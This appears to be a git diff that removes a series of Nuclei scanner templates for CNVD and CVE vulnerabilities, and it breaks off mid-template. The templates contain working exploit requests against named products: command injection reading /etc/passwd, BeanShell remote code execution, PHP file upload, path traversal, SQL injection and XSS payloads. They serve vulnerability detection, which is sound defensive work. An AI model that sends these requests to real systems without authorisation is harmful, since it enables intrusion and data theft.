GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/17
|
|
@ -1,36 +0,0 @@
|
|||
id: CNVD-2021-15824
|
||||
|
||||
info:
|
||||
name: EmpireCMS DOM Cross Site-Scripting
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/empirecms/
|
||||
- https://www.bilibili.com/read/cv10441910
|
||||
- https://vul.wangan.com/a/CNVD-2021-15824
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cwe-id: CWE-79
|
||||
tags: empirecms,cnvd,cnvd2021,xss,domxss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'if(Request("url")!=0)'
|
||||
- 'href=\""+Request("url")+"\"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/23
|
|
@ -1,36 +0,0 @@
|
|||
id: CNVD-2021-17369
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cwe-id: CWE-522
|
||||
tags: ruijie,disclosure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/xml/webuser-auth.xml"
|
||||
headers:
|
||||
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<userauth>"
|
||||
- "<password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/16
|
|
@ -1,36 +0,0 @@
|
|||
id: CNVD-2021-26422
|
||||
|
||||
info:
|
||||
name: eYouMail - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: eYouMail is susceptible to a remote code execution vulnerability.
|
||||
reference:
|
||||
- https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
|
||||
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: eyoumail,rce,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
type='|cat /etc/passwd||'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,51 +0,0 @@
|
|||
id: CNVD-2021-28277
|
||||
|
||||
info:
|
||||
name: Landray-OA - Local File Inclusion
|
||||
author: pikpikcu,daffainfo
|
||||
severity: high
|
||||
description: Landray-OA is susceptible to local file inclusion.
|
||||
reference:
|
||||
- https://www.aisoutu.com/a/1432457
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
||||
metadata:
|
||||
fofa-query: app="Landray OA system"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
tags: landray,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
var={"body":{"file":"file:///etc/passwd"}}
|
||||
|
||||
- |
|
||||
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
var={"body":{"file":"file:///c://windows/win.ini"}}
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "for 16-bit app support"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,50 +0,0 @@
|
|||
id: CNVD-2021-30167
|
||||
|
||||
info:
|
||||
name: UFIDA NC BeanShell Remote Command Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
|
||||
reference:
|
||||
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||
- https://chowdera.com/2022/03/202203110138271510.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2021,beanshell,rce,yonyou
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- | #linux
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("id");
|
||||
|
||||
- | #windows
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("ipconfig");
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid="
|
||||
- "Windows IP"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "BeanShell Test Servlet"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/07/05
|
|
@ -1,48 +0,0 @@
|
|||
id: CNVD-2021-49104
|
||||
|
||||
info:
|
||||
name: Pan Micro E-office File Uploads
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
|
||||
reference:
|
||||
- https://chowdera.com/2021/12/202112200602130067.html
|
||||
- http://v10.e-office.cn
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
|
||||
cvss-score: 9.9
|
||||
cwe-id: CWE-434
|
||||
remediation: Pan Wei has released an update to resolve this vulnerability.
|
||||
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4
|
||||
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<?php echo md5('CNVD-2021-49104');?>
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4--
|
||||
|
||||
- |
|
||||
GET /images/logo/logo-eoffice.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "94d01a2324ce38a2e29a629c54190f67"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/02/28
|
|
@ -1,49 +0,0 @@
|
|||
id: CNVD-2022-03672
|
||||
|
||||
info:
|
||||
name: Sunflower Simple and Personal - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
|
||||
reference:
|
||||
- https://www.1024sou.com/article/741374.html
|
||||
- https://copyfuture.com/blogs-details/202202192249158884
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2020,sunflower,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/rpc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
action=verify-haras
|
||||
- |
|
||||
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: CID={{cid}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: cid
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '"verify_string":"(.*?)"'
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1==200"
|
||||
- "status_code_2==200"
|
||||
- "contains(body_1, 'verify_string')"
|
||||
- "contains(body_2, 'Windows IP')"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,41 +0,0 @@
|
|||
id: CNVD-2022-42853
|
||||
|
||||
info:
|
||||
name: ZenTao CMS - SQL Injection
|
||||
author: ling
|
||||
severity: critical
|
||||
description: |
|
||||
ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"zentao"
|
||||
fofa-query: "Zentao"
|
||||
tags: cnvd,cnvd2022,zentao,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /zentao/user-login.html HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}/zentao/user-login.html
|
||||
|
||||
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'c8c605999f3d8352d7bb792cf3fdb25'
|
||||
|
||||
# Enhanced by mp on 2022/09/28
|
|
@ -1 +1 @@
|
|||
13c725619504bbdcfa49f018547818d2
|
||||
007505eab9adec1b628522c2675730ee
|
||||
|
|
|
@ -1,35 +0,0 @@
|
|||
id: CVE-2000-0114
|
||||
|
||||
info:
|
||||
name: Microsoft FrontPage Extensions Check (shtml.dll)
|
||||
author: r3naissance
|
||||
severity: low
|
||||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cve-id: CVE-2000-0114
|
||||
cwe-id: NVD-CWE-Other
|
||||
cvss-score: 5.0
|
||||
remediation: Upgrade to the latest version.
|
||||
tags: cve,cve2000,frontpage,microsoft,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/_vti_inf.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
|
@ -1,29 +0,0 @@
|
|||
id: CVE-2001-1473
|
||||
|
||||
info:
|
||||
name: Deprecated SSHv1 Protocol Detection
|
||||
author: iamthefrogy
|
||||
severity: high
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 7.4
|
||||
cve-id: CVE-2001-1473
|
||||
cwe-id: CWE-310
|
||||
remediation: Upgrade to SSH 2.4 or later.
|
||||
tags: cve,cve2001,network,ssh,openssh
|
||||
|
||||
network:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Host}}:22"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SSH-1"
|
||||
|
||||
# Enhanced by Chris on 2022/01/21
|
|
@ -1,49 +0,0 @@
|
|||
id: CVE-2002-1131
|
||||
|
||||
info:
|
||||
name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
reference:
|
||||
- http://www.redhat.com/support/errata/RHSA-2002-204.html
|
||||
- http://www.debian.org/security/2002/dsa-191
|
||||
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
|
||||
- https://www.exploit-db.com/exploits/21811
|
||||
- https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
|
||||
- http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cve-id: CVE-2002-1131
|
||||
cwe-id: NVD-CWE-Other
|
||||
cvss-score: 7.5
|
||||
tags: cve2002,edb,xss,squirrelmail,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
|
||||
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
|
||||
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,41 +0,0 @@
|
|||
id: CVE-2004-0519
|
||||
|
||||
info:
|
||||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/24068
|
||||
- http://security.gentoo.org/glsa/glsa-200405-16.xml
|
||||
- http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857
|
||||
remediation: Upgrade to the latest version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 6.8
|
||||
cve-id: CVE-2004-0519
|
||||
cwe-id: NVD-CWE-Other
|
||||
tags: squirrelmail,cve2004,cve,edb,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/01/27
|
|
@ -1,35 +0,0 @@
|
|||
id: CVE-2005-2428
|
||||
|
||||
info:
|
||||
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
|
||||
reference:
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
|
||||
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2005-2428
|
||||
cwe-id: CWE-200
|
||||
tags: domino,edb,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/names.nsf/People?OpenView"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
name: domino-username
|
||||
regex:
|
||||
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
|
@ -1,40 +0,0 @@
|
|||
id: CVE-2005-3344
|
||||
|
||||
info:
|
||||
name: Horde Groupware Unauthenticated Admin Access
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
|
||||
- http://www.debian.org/security/2005/dsa-884
|
||||
- http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2005-3344
|
||||
cwe-id: NVD-CWE-Other
|
||||
tags: cve,cve2005,horde,unauth
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/admin/user.php"
|
||||
- "{{BaseURL}}/admin/user.php"
|
||||
|
||||
headers:
|
||||
Content-Type: text/html
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Horde :: User Administration</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/18
|
|
@ -1,34 +0,0 @@
|
|||
id: CVE-2005-4385
|
||||
|
||||
info:
|
||||
name: Cofax <=2.0RC3 - Cross-Site Scripting
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
||||
reference:
|
||||
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
||||
- http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2005-4385
|
||||
cwe-id: NVD-CWE-Other
|
||||
tags: cofax,xss,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'>\"</script><script>alert(document.domain)</script>"
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,39 +0,0 @@
|
|||
id: CVE-2006-1681
|
||||
|
||||
info:
|
||||
name: Cherokee HTTPD <=0.5 - Cross-Site Scripting
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
|
||||
reference:
|
||||
- http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
|
||||
- http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
|
||||
- http://www.vupen.com/english/advisories/2006/1292
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2006-1681
|
||||
cwe-id: NVD-CWE-Other
|
||||
tags: cherokee,httpd,xss,cve,cve2006
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2006-2842
|
||||
|
||||
info:
|
||||
name: Squirrelmail <=1.4.6 - Local File Inclusion
|
||||
author: dhiyaneshDk
|
||||
severity: high
|
||||
description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/27948
|
||||
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
|
||||
- http://www.squirrelmail.org/security/issue/2006-06-01
|
||||
- http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-2842
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2006-2842
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2006,lfi,squirrelmail,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,40 +0,0 @@
|
|||
id: CVE-2007-0885
|
||||
|
||||
info:
|
||||
name: Jira Rainbow.Zen - Cross-Site Scripting
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference:
|
||||
- http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
|
||||
- https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-0885
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
||||
cve-id: CVE-2007-0885
|
||||
cwe-id: NVD-CWE-Other
|
||||
cvss-score: 6.8
|
||||
tags: cve,cve2007,jira,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,35 +0,0 @@
|
|||
id: CVE-2007-4504
|
||||
|
||||
info:
|
||||
name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/4307
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-4504
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2007-4504
|
||||
cwe-id: CWE-22
|
||||
tags: lfi,edb,cve,cve2007,joomla
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,42 +0,0 @@
|
|||
id: CVE-2007-4556
|
||||
|
||||
info:
|
||||
name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: |
|
||||
